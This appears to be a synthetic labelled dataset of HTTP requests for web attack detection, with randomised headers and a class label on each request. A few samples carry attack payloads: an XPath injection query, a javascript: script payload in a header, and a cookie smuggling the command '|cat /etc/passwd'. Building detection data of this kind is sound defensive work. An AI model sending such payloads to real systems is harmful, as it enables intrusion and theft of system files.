UA-Pixels: 190x433
Via: HTTP/3.2 68.207.115.51:1
Transfer-Encoding: ieil
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 638 www.oh9eua.css:9 "almetzkpnsa4" 
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 210714537840
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26655
Start - Id: 32433
class: Valid
GET /nph3iti0/iaibalwdeaamIrgnoa5s/42zw6Fr/0ywlaoG-6MVE/gKdZ91LU83T3DVHK/eraw6Xi/vheyz5a8aottr/mzNm/TLVCpOjmetaCvarQhYx5.mspx? HTTP/1.1
Host: 110.212.247.219
Connection: close
Accept: text/plain, image/jpeg;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.8
Accept-Language: i-e9ppwtDe;q=0.2, nsebOtss-nqhs;q=0.8, k-aaru;q=0.0
Cache-Control: no-transform
Client-ip: 61.133.94.100
Cookie: mDN1UI=dBE@q1.;anod9=4726;bTjJEe=pscripto;boE=etdneUaor
Cookie2: $Version="25"
Date: Wed, 05 May 04 03:40:45 CET
ETag: "tqC@JMKR_PyTjEEXyEls"
Expect: iuxhGc=9rS7mt
From: releg@syoCrleekk.net
If-Modified-Since: Fri, 02 Feb 07 15:44:41 CET
If-Unmodified-Since: Wed, 17 Nov 04 09:57:44 UTC
If-Match: "nr5CFLJQ.YKFeBZqtj"
If-None-Match: "A2p@G-VB4Catm.WOg@"
If-Range: *
Max-Forwards: 2571
MIME-Version: 9.5
Pragma: d5azjaws='migt'
Proxy-Authorization: paTwhc mnk8mnhm=2baxf
Authorization: Basic bEh5ZWVyOjlyYnNtU25p
Range: -559,9543-
Referer: /aite9/Orxho8zo/c2otsis/tmhh/aw6srh.cfm
TE: chunked;q=0.5,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/2.6 (X11; U; Solaris 5.6; td-is; rv:9.9.6) Gecko/55108428
UA-CPU: PowerPC
UA-Disp: 339,988,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5662x6161
Via: HTTP/1.6 195.96.5.7
Transfer-Encoding: compress
Upgrade: 1o0/3.7, s7dacb/4.7
Warning: 635 www.g4Aean.shtml:356 "6nfv" "Tue, 13 Mar 07 11:19:31 UTC"
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32433
Start - Id: 35888
class: XPathInjection
GET /5ARBy4XWGbwOv0d/kMG7lxlp5HBf_6_IUU/eOGl2@X0tBr4A/th8sTomqEhromi/VW_/Mefrtmcmfhhdc.exe?w5btes=sKK8m3VIjv&hrc=tJisqu%27++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+i%2Bj++++%2B+++k+%2B++l+++%2B+++1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27mehfnyn%27++%3D+%27+++++ye%27+++++or&Ee=khhiadysho&0aunE=5htpassTp&eoemhIoe9e1=46390681&gan8dtfedsahes=256&7.kmCymGBoxform=90475&cadlySart4=21119&eNhmu=erndl+ss%28logejmj&uOSa=60697&6ease3l=03632&iIlyecPtnarnlo=e&kewerycnnhtsh=Ohsock_streamwinntservicesnnwheredohtacces%29frr4%2Bsoc&bodyW2km=83&a2dsg6ssal2mhtd=t5%40jKdUc HTTP/1.1
Host: 96.26.103.213
Connection: close
Accept: application/*, video/quicktime;q=0.1, video/quicktime
Accept-Charset: x-mac-arabic, cp-936;q=0.6, x-mac-greek, utf-8;q=0.3, euc-kr
Accept-Language: *;q=0.2
Date: Tue, 17 Nov 09 12:13:47 UTC
If-Range: *
MIME-Version: 7.2
Proxy-Authorization: NTLM cmlMbnhlb2VhRWE1cmVkaVRlMmVlc2xlMWRydWNjZXNuZW4=
Referer: http://www.tnapa.org/lhe7oma/sl8hc1n/dshoasrI.mspx
User-Agent: Mozilla/6.8 (compatible; c6stE; Linux i386; vjohinhss; tmlxbeufu)
Via: FTP/1.8 21.149.165.1, FTP/3.9 www.eitn.htm:16065

null

End - Id: 35888
Start - Id: 6757
class: Valid
PUT /esed9/sAMlFZ1Jhfsk/eorosnnEpouveiheR/230PPpVKgsL/oRl3n/aqU.hTGyqoQFws66hmc/cCtCilctO.nsf? HTTP/1.0
Content-Length: 340
Content-Language: 8d,hbesae
Content-Encoding: compress
Content-Location: /tthtmt/eCh61je1.gif
Content-MD5: b2Jhc3ZVaGFhZWRyeWZicg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 May 07 10:25:03 UTC
Last-Modified: Sun, 22 Aug 04 20:28:16 GMT
Host: www.sB6iv3t.it
Connection: keep-alive
Accept: image/*;q=0.3, application/*, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: iejard5t-slai2bN1;q=0.7, ehutd-egm7favi;q=0.6, aPei-mttht6, mi3imua-Lea7yc2
Cache-Control: max-stale=30668
Client-ip: 197.112.140.244
Cookie: Eeeioiwk1=436391;neRusDbSqplcamM=64451015;LD-Xefmecechowindow.open=7tnpmqptewno7liNR;hlcoctcetspir=Oa;sm=Booerq
Cookie2: $Version="656"
Date: Tue, 01 Feb 05 05:36:57 UTC
ETag: "0ONLYSZEA8LxBfpvKr"
Expect: zoesod=39oesf
From: i6Nyv@5oumwccEOt.be
If-Modified-Since: Fri, 22 Jan 10 05:26:37 CET
If-Unmodified-Since: Tue, 23 Nov 04 16:37:23 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Mar 04 23:29:00 GMT
Max-Forwards: 95
MIME-Version: 8.5
Pragma: nentet='eonltr9'
Proxy-Authorization: NTLM azNlZXhoZW5kb3JlbmUycm01bW9ldGV0c2FuZ29jMXVzb29vUmV1
Authorization: NTLM cW5laGloRUllb2lka2hhdUVlaGJydTVneEZhZnJpaGF2aHRvZHNzaWdqem5zYXQ=
Range: 6-,0896-57
Referer: http://www.leytoio9.be/ffooet.jpg
TE: trailers,chunked
Trailer: Expect
User-Agent: em@3kYDSp http://www.aual.be
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3268x616
Via: 5.9 29.72.3.218, Tinnd/2.3 www.ieuu.js, 3.7 www.euneawig.shtml
Transfer-Encoding: deflate
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 343 www.aS74.js "ImalcxyglU" "Sat, 10 Jul 04 23:42:51 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 5587841310492306
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o3Aht=6722512&xwmFji81aet8=4031895&aazrneeeoshoiok=tpenodes8""t)e=yani7$&nciyhiEtdXchro=elup&2iehp=zraeeeo&hhAynm=eJjc&x@xj_5v=69121&mtEahakToUok=df&uYn=428700&KiframevaraCXx1tmphdiv=e document&arhnlpsiazilc=nots4hdou9unss1&EZgxFtincludebkinclude=h9njugrbspd0als&rogvgcoie7i1e=j$ytatahee&ufnosrer=blssee&nodezYautoexec5q5@3=vTEV

End - Id: 6757
Start - Id: 31356
class: Valid
GET /iau/us/c10yefahhamhs4ytao/t7-5KkZT.shtml?rpo=Ao&IcDeFfdmeNts=sl&Paccess_log9ZahpNp3Q=hwzttrl&niooMpdn=oe-&rAyywrpfrq=pvgi+&sepaelgdew=%3CLpz%28eeaEiu%3Da HTTP/1.1
Host: 1.131.187.172
Connection: close
Accept: text/*;q=0.7, video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 34.199.208.241
Cookie: eARag5rsgmn=lrrebiOvdehrilu4an;onde3Ne=79551764;6thasytn=evallog0;zilnrTrr=Re;nxk5en29est=fealdtecoatPprhu;hsyeun1=947771793
Cookie2: $Version="1"
Date: Fri, 15 Oct 04 13:04:13 CET
ETag: W/"7X5uC4ZuUCgBHfe"
Expect: Tine3nen
From: iaamdisn@peasep.org
If-Modified-Since: Sat, 06 Jun 09 08:57:07 CET
If-Unmodified-Since: Sun, 05 Aug 07 09:54:06 CET
If-Match: "0S7jyLSWsp-YnNuzcb"
If-None-Match: "shL30E.z48i471pTe"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.1
Pragma: onFuh=zdnno6oa
Proxy-Authorization: NTLM dHJkanQ2cmNlYXdPZXJtbnppZWV1dHRvb0dlZnVvYm9pZmhwYU52aXVzOG53VXJh
Authorization: Digest response="3cF4A7Efa9Cf8C844FFEffd30CBbD47A"
Range: 8-,2512-,696-3957
Referer: http://eeWE.uk/haexaxur/Aewa46s.pl
TE: chunked
Trailer: TE
User-Agent: asm2mlmlEp8romtd
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 562x0900
Via: 2.5 www.ni0l.html:0, 1.1 www.ev16.html
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: lil/6.2
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 56784
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31356
Start - Id: 29424
class: Valid
GET /iVvOW9tvftKpa-z4/6nrle7irpeOlprodac9y/tarTwezefsgain0au/inputVVxN3YZK/mpDMwperl-f/huK2jlbY_Cv.js?Tle7o8daIceAleF=63&dunion-8=x+union++%3AoNs%7Clitn+v%7E4ra&7d7t1oeavdluzn=36&cedzgo=od%3Ca&itret=rhnN%7Cwte%27&foetcpg8=9ddfmrt&ynoicalxutaiTu=oaSpoinclude+oet&naeew4C=7dspkeiznaezrudaap&I7JvmochaxtY=oR8r6nlaahrRuohh&xSi2iUNiw=9Kx2cQ&ttloxri3=t%5Ci%3Carstyleatr4%2F&.elFFboot.iniZNTC=Tnulls&in5Zx1xp_ltTSy3=c%25n HTTP/1.1
Host: www.onWedc.cz
Connection: eefny
Accept: */*;q=0.8
Accept-Charset: x-mac-greek, koi8-r
Accept-Encoding: 
Accept-Language: n-S, hsej-tnOhaie2, Ee-dieno;q=0.4, na-re4a8;q=0.0
Cache-Control: min-fresh=9359
Client-ip: 214.249.83.255
Cookie: pe=XtTrwuu7n;qArternN=ehM5_fcc;3O1lGHoD3=Y-5dkusr2raj;uah=90852077;n9vaursrseBnEl=E3%sqyd=hI
Cookie2: $Version="17"
Date: Fri, 04 Jun 04 05:43:29 CET
ETag: W/"jMOh75yYYBefnn43znI"
Expect: e4skeya=nemhrRk;zegybsow
From: suaPf@niebaoeya.org
If-Modified-Since: Wed, 28 Jun 06 21:29:47 UTC
If-Unmodified-Since: Mon, 06 Jul 09 04:56:18 UTC
If-Match: *
If-None-Match: "Trsf6q4YY0QcIr2cr"
If-Range: *
Max-Forwards: 2597
MIME-Version: 6.5
Pragma: dnslo='df'
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: NTLM bW5hYTBjY3NmbFplZWJuc2NwT2FlZWxvaGV1bGVndEVvTkVlb3RtNXZjdA==
Range: 2-278,82-815
Referer: http://www.tka1hr.fr/inxiIt8l/tneusvt.tiff
TE: trailers
Trailer: Upgrade
User-Agent: 5ayalie (uFmKymaZ; dpdFIt; lWTMuv)
UA-CPU: PowerPC
UA-Disp: 2709,267,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 437x5082
Via: 0.9 www.evimdidj.png, FTP/1.3 21.61.115.200
Transfer-Encoding: identity
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 703 77.103.235.152 "rrfeeSn4cnstcAhs" "Sat, 09 May 09 09:03:00 GMT"
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 754248
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29424
Start - Id: 23817
class: Valid
GET /document0v0dAx4XbKinsert/88M.vbscript2goG6.cfm?x3ohtdg=5699441&co=5&Sinnhetsn0aSta=8556572&g6itcus0hdoo=Yn+&hxganiatz=ja8tn0lrt&tcsfotRoataas=+faur%7E&qtrostemehmh8=65511545&@OWYFkEBG=7&AiiAie=2sukt2cdee&tfrChedsam=9427 HTTP/1.0
Host: 24.95.240.67
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, iso-10646-ucs-2, cp-950;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 1.109.180.253
Cookie: 8fo6=2014932;t4o9obovx=t~e;ost1nyC3nuomt=nea6lz96ues0tr
Cookie2: $Version="72"
Date: Fri, 13 Feb 09 17:59:27 CET
ETag: "nB_D5UyypLYa6kJ"
Expect: iste5
From: dhmtihz@kNxat8.be
If-Modified-Since: Sat, 16 Dec 06 06:46:35 GMT
If-Unmodified-Since: Wed, 07 May 08 21:08:22 UTC
If-Match: "KmZGqQj@jxYDHdc"
If-None-Match: *
If-Range: Fri, 20 Oct 06 24:49:20 UTC
Max-Forwards: 2
MIME-Version: 8.6
Pragma: r=tw9achs
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: Digest username="oledse"
Range: -2529,475940-,651-
Referer: http://iiniyt.com/r8rd/An6edc/mSr2eI.php4
TE: gzip;q=0.9,trailers,chunked
Trailer: Connection
User-Agent: Mozilla/6.6 (compatible; Konqueror/7.7; Win 9x; noynfcioee; sxfOioti; eesd1dxiAt)
UA-CPU: PowerPC
UA-Disp: 873,2012,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4203x994
Via: 3.8 220.227.141.130:77240
Transfer-Encoding: deflate
Upgrade: rae/8.5, ne4/3.3, e4ck/8.2, 0teaus/2.2
Warning: 430 www.eLse.jpeg "spnnieaetrdru" "Tue, 30 Sep 08 02:07:35 UTC"
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 370786959520494
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23817
Start - Id: 31442
class: Valid
GET /eriiat/4EjIV8lFkRWMnS.gif?roo=vchtpzrwqh&Kiini=tLa38+r%2Bfers+6&a96=52521275&eoziN9ghdd=rDeasot4qtform%3Fro%5Bia&rehlcatDuevalSXSu=hdtfrom&3rvtdmohiretetz=%3Du&Hf8zm0weuF=uVYzR8Z&9e7hvrfoa97=cunionrh&tscamtNwzEori=e+oduutoq2aTot&XFoC9w6N=%5B%24Tieyxa+m1ooTE4t&lo=H&ae=wsxPaec%3Fslogd%2Fe+&cCvbX=9961529 HTTP/1.1
Host: www.nmaxa9.be:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-932;q=0.7, euc-cn, windows-1251, iso-8859-15, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 251.240.231.143
Cookie: Jas@xtermI=bTofH91gUISV;Istdactn1oo=$taoetajnelo;HLqejEp=Lgs s
Cookie2: $Version="471"
Date: Sun, 19 Oct 08 07:14:16 UTC
ETag: W/".7BiS1g@7A@OIIL-E"
Expect: hd9dnwt2=nxMer4
From: vconid@sswn.net
If-Modified-Since: Fri, 28 Jan 05 13:00:52 CET
If-Unmodified-Since: Thu, 30 Dec 04 24:50:32 CET
If-Match: *
If-None-Match: "_Bi7kB4rVoNRrYmgZ"
If-Range: Mon, 15 May 06 18:46:03 UTC
Max-Forwards: 6227
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: hchos tglefect=mpumcNne
Authorization: Basic YXNtMTA6SWhzMGE1bHQ=
Range: 6-
Referer: http://www.hlenalto.st/thrtYlst.jpeg
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: ouee/7.8.6
UA-CPU: PowerPC
UA-Disp: 4201,0533,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4140x395
Via: 0.6 143.206.80.93, HTTP/6.8 106.52.167.154
Transfer-Encoding: identity
Upgrade: Ydta/8.0, aai/3.3, 2eoey/4.9, eyfn/6.3
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 31442
Start - Id: 7980
class: Valid
POST /efyResd0et/7Rak6dquShioWn0drnvs/bbCbQ@3DJhfs4YT7RPB5/hl/nffkeQ7gKDWyORLu/-c./3Rbodye9ZUo/aolhas4eejnauwM/isTtet5/3tw8euNqntrne0osiO.jpeg? HTTP/1.0
Content-Length: 218
Content-Language: inp,aauiehuh
Content-Encoding: deflate
Content-Location: /icceSiE/jeijc.mp3
Content-MD5: YXVjYm5peGlyb2FycmVtZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Jun 04 18:13:28 UTC
Last-Modified: Fri, 20 Jun 08 24:57:10 UTC
Host: www.orec1.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-932
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 75.162.183.217
Cookie: M054homeFJ=tP0VIi;eeetaThTsgnfst=944;ehl8tl9naap7Hrs=8?nf\>=p
Cookie2: $Version="3"
Date: Thu, 27 Aug 09 24:47:51 CET
ETag: "vSwg.t8VN@YH431HW"
Expect: a9oS8=esntrd
From: lggvhin@tEusa.fr
If-Modified-Since: Sun, 22 Jun 08 18:33:48 GMT
If-Unmodified-Since: Sun, 01 Oct 06 23:00:47 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Apr 10 18:59:23 UTC
Max-Forwards: 8940
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic NnR0ZXg6MWppamloaWg=
Authorization: Basic ZWE4ZGVhTjpvZWx5c2Vl
Range: -607
Referer: /ilaeiIx/asvmdieE/vSliarh/satgex/sauj.pdf
TE: deflate;q=0.2,trailers,deflate
Trailer: User-Agent
User-Agent: zieeew3me (rn2OW-Ola; e8AVn2a0.0; nk3AMbmI; ufhyXZCCa; eB3xPp8)
UA-CPU: x86
UA-Disp: 4676,8640,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 094x6003
Via: ertdra/0.7 www.XIegtadH.tiff
Transfer-Encoding: gzip
Upgrade: tgnzyn/1.3, beNq/5.8
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ao=6&nsIr5xabogusos=Ew4liaesavettOkn&eesssymt=536213&entnafzif=a7JFNABu&Vghti4n=d0saoelwaeEexogA&etfibb1eluln=gvYvq&4l==> htpassAeopendsisastylenfN&eylai12i=openr0aienhipn&wo=shcbezeu8rnteu?ss|&g7R5hteiis=fs0Lr

End - Id: 7980
Start - Id: 29980
class: Valid
GET /6u3fds.od_Vse6QiLwb.html? HTTP/1.1
Host: www.ieliaitzs.org
Connection: teihn
Accept: video/mpeg;q=0.6, audio/*, image/png;q=0.3
Accept-Charset: cp-950;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 26.168.29.0
Cookie: aho=steurRr;connecthtaccesW1M8tlsWY=forpi
Cookie2: $Version="308"
Date: Fri, 05 Mar 10 10:03:41 GMT
ETag: "bibmdyuKcRpl1LGBjwPa"
Expect: oAlen
From: aStEgfh@opEoler.st
If-Modified-Since: Tue, 18 Mar 08 05:02:17 CET
If-Unmodified-Since: Fri, 14 Mar 08 01:48:34 CET
If-Match: "gvqDR42OJtwL3-A"
If-None-Match: *
If-Range: Wed, 05 May 10 18:34:51 CET
Max-Forwards: 9671
MIME-Version: 0.1
Pragma: petaevi='al'
Proxy-Authorization: rrrf natgEri=u7aTNgi8
Authorization: NTLM Y29zaHJycnR6YTF5aG5hY25laFRySXV3dGVndHRIQWVyZXh1dA==
Range: 89712-
Referer: /3l3Fl/fbtrn/tepnedhe/8a9cl/ouwnqve.jpeg
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: lZXkkN http://www.hxLrs.de
UA-CPU: StrongARM
UA-Disp: 644,8528,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 912x832
Via: 2.2 122.181.119.8, 4.7 22.150.168.9
Transfer-Encoding: wwrgi
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29980
Start - Id: 15570
class: Valid
GET /imt9srtywela5/brbo/YnZjmprocessing-instruction@7Wj4dF3/y2/FcO5fmEkw/ni1eaamIekqq/Ipsodcsddaofw/caotrr3/kUXoYla1NL/pBs3catgaI/nK0Ae/3X73I9FMiNHXa7jlKJ.js?hTA=tf058l&vilTfAeaHSttn=er%409s3LnoW&itwsncyat=v6l&seuFseancth=nV.T&etcnAe0irwoh=aprd HTTP/1.0
Host: www.yL2iocssra.net
Connection: keep-alive
Accept: video/mpeg, application/rtf, text/*;q=0.3
Accept-Charset: iso-8859-8;q=0.6, windows-1257, x-mac-arabic;q=0.7, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: si-bi, lou-htkl;q=0.7, mesnr-ie97ic;q=0.5, nia-t6cHl, ro-aeeHpe
Cache-Control: max-age=6795
Client-ip: 43.215.22.138
Cookie: epegtspeBton=5582116;datdla1d=dAiZepTmlD;8bht=31;orua7ae0tSElaoT=yNL_Ee
Cookie2: $Version="82"
Date: Tue, 16 Sep 08 16:38:19 GMT
ETag: "mNbVp5ZBEarBgcSmY"
Expect: syepee=rtoRe
From: Ftobr@eibao.net
If-Modified-Since: Sat, 20 Jun 09 22:04:05 UTC
If-Unmodified-Since: Mon, 31 Oct 05 19:18:48 UTC
If-Match: "F6r8ZL0utlH8@w_kl"
If-None-Match: "y8jTWuM7lymVbuaL"
If-Range: Fri, 01 Jul 05 09:01:08 UTC
Max-Forwards: 9
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: eus2 eSnte84a=le4gb
Range: 501313-
Referer: /rdinta/oull/dtwSurx5/eeTp.tiff
TE: chunked;q=0.7
Trailer: Cache-Control
User-Agent: 5rsOceo3/9.4
UA-CPU: MIPS
UA-Disp: 213,6888,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 817x4367
Via: HTTP/3.1 115.101.128.166, 5.6 www.cEtRs.png:755
Transfer-Encoding: gzip
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 749 20.33.77.96 "uwiswnsUsono4itdna" "Tue, 24 Jun 08 04:13:34 CET"
X-Forwarded-For: 70.192.139.43
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15570
Start - Id: 46645
class: XSS
GET /Jinsertastyle3linputn/h.nEC.ksMUu5novEQgaB/iEs60joNa/9o4kd9eth/1whereqeZC8/tnr4ei/h8W.asmx?WqrcpxpR_Ndivc=8473409&eh8o=50255 HTTP/1.0
Host: 108.198.107.220
Connection: keep-alive
Accept: video/mpeg, image/jpeg;q=0.5, video/*;q=0.1
Accept-Charset: x-mac-cyrillic, x-mac-cyrillic, iso-8859-3
Accept-Encoding: <object  classid  =   "   clsid:...  "   codebase  =   "javascript:    [alert   ('aeyel');]    "  >
Accept-Language: sShdrbts-fgctve, weSad-y;q=0.1
Cache-Control: no-transform
Client-ip: 37.218.107.50
Cookie: aenntoanr=->nl[osg;oulaei9qjoerdl=e3oasrlye;rRbKNHF=srRxu0Oat6eqdbvaa;446CeRsx4Be=152610425
Date: Mon, 23 Aug 04 16:17:16 UTC
ETag: W/"x_dxmcYMKBlQmZ3"
Expect: nrfk
If-Modified-Since: Fri, 02 May 08 13:23:51 UTC
If-Match: "-DTJ2.VSV0BzH_Q"
If-None-Match: *
If-Range: "ewJu9VgBZU.Uxntv"
Max-Forwards: 1272
MIME-Version: 1.7
Referer: /m1etvulb.tiff
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 8.2; 3c-mH; rv:2.9.2) Gecko/85487038
Via: 2.1 137.126.128.179, FTP/1.3 243.108.222.212, HTTP/4.7 4.75.212.179

null

End - Id: 46645
Start - Id: 21893
class: Valid
GET /suNhekottzrlteg.dll?mcsfsuhfbri=tsae&UNOK=itakh5Hh+si&cegteRa=acfud&URaXD6sJQL=s5xterm&4lEeartQ=8&4kTtfsntiieuh=wiq&dea33tc86=ps6hri&aeO=nr%7C&ysspeySakea=862294041&lCgtgi=04008&iv=%3E%5C&t3wa=%40H+efiso&t3Ctrcqbi=g.S39&al=wnfaN0 HTTP/1.0
Host: 26.54.70.3
Connection: R1ehrewy
Accept: text/*;q=0.4, text/plain, video/*;q=0.9
Accept-Charset: iso-8859-8-i;q=0.6, windows-1251;q=0.5, windows-1251;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 43.249.147.131
Cookie: Lyentt4teitf=2525;krlAit4IwRn=eperl'nve;Oirr=bhnty;enccc7aei=6
Cookie2: $Version="22"
Date: Fri, 24 Jul 09 01:40:23 UTC
ETag: "IIr71fOmkBg3nFZHdc"
Expect: dddshiix
From: gspde@ia3eGzume.be
If-Modified-Since: Mon, 06 Nov 06 13:33:44 CET
If-Unmodified-Since: Thu, 13 Mar 08 06:15:57 GMT
If-Match: "mQe9-cqK_3MxoszGn"
If-None-Match: "dlq_YtI8S6emSRD_brCx"
If-Range: *
Max-Forwards: 973
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: df2eS3 ttam=ecout
Authorization: NTLM Y2J0MDRycXJkaGphZWZpZWhoeXM4eXRUQWtlZWNuY3Fh
Range: -34244,001-
Referer: /brti/0xsurn/Ljwltt1.tar.gz
TE: trailers,chunked,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.5 (X11; U; Solaris 9.6; e5-er; rv:6.2.2) Gecko/70415309
UA-CPU: StrongARM
UA-Disp: 9551,981,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x803
Via: 4lie/6.2 www.9eeaee0.htm, 3.2 15.204.187.157, FTP/7.6 103.49.148.132:3031
Transfer-Encoding: gzip
Upgrade: 7c8/8.3, xeima/1.3
Warning: 119 www.ihb8.jpg:9 "o3inrtnebtm2rTp" "Wed, 29 Oct 08 15:39:42 CET"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 3182273
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21893
Start - Id: 43638
class: OsCommanding
POST /ogVlCWEX/2etbt2dh/3or/It1wx/Fq/it6rRjNm-/af.Ko@Hmfj/s5B29.pl? HTTP/1.1
Content-Length: 256
Content-Language: eagO,n0a
Content-Encoding: deflate
Content-MD5: dmxObHdhNXRlaXRyZThvYQ==
Content-Type: application/x-www-form-urlencoded
Host: www.wrdre.uk:3
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii, x-mac-greek;q=0.0
Accept-Encoding: gzip;q=0.0
Accept-Language: yt-Et;q=0.8, 7-rs;q=0.7
Client-ip: 144.153.29.222
Cookie: ooedehFa4=5896094;uwtY=|cat    /etc/passwd;ZhuyIgax2V43=rCeq eocsystemcdtsts
Cookie2: $Version="15"
From: Eseuz@1se5bIm.biz
If-Modified-Since: Thu, 09 Nov 06 23:50:01 UTC
If-Range: Fri, 10 Aug 07 06:31:57 GMT
Max-Forwards: 57
Pragma: no-cache
Referer: /reeabe4/rmwOszu.jpeg
Trailer: Connection
User-Agent: Mozilla/7.3 (Windows; U; WinNT 7.1; en-ba; rv:6.8.5) Gecko/61206325
Transfer-Encoding: snsno
----: --------------------

eswdseunek=t10a&ln=etv&ndiohoNf1xe5hr=3f1 Trughh&ccnltth9nr=25722&jurtetr6mrni=acfqtOM3gEc&peea= sc=E&7lbmg=OduorreapnvwOy8uL1&bhmhlike=ney sbodygroup byknexe 4e n&zZEtVK= &steacboieag=(eieyei&elm6r=07063&uiottseoctstn6=t a%ehavinghtWnstdin&ee61eaZ=s

End - Id: 43638
Start - Id: 314
class: Valid
GET /H99og92kSnqO/TKmzEM5iJmetapdUyj/MyiIp5DnhBPtmpusr@W/ekQQD2M/iswssk9vso/rgi2G/a4Itjxn.tiff?soFpso=mrs+tlDantdd&teean=s%27divo&RK3HB5D9=e&ieoftda=ptcxvZa0sB&otxkcd=paihril&iaeace2=%27tlH&lkprtsute=an%24Aur%24il&PO4eisi=h7&m4ASfQideiTmfN=60664&window.opentaqYY=5723701 HTTP/1.0
Host: www.Shn1jter.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: tpneaat-qeoh, paekbee-y
Cache-Control: no-cache
Client-ip: 192.79.226.172
Cookie: nqtfek=:;o3GoDies=isetoottfL00;OOygroehic=neprphr;e3xdodk7rA8aEg=-ttmp;wSwtnt=acU_0
Cookie2: $Version="5"
Date: Thu, 21 May 09 07:02:51 CET
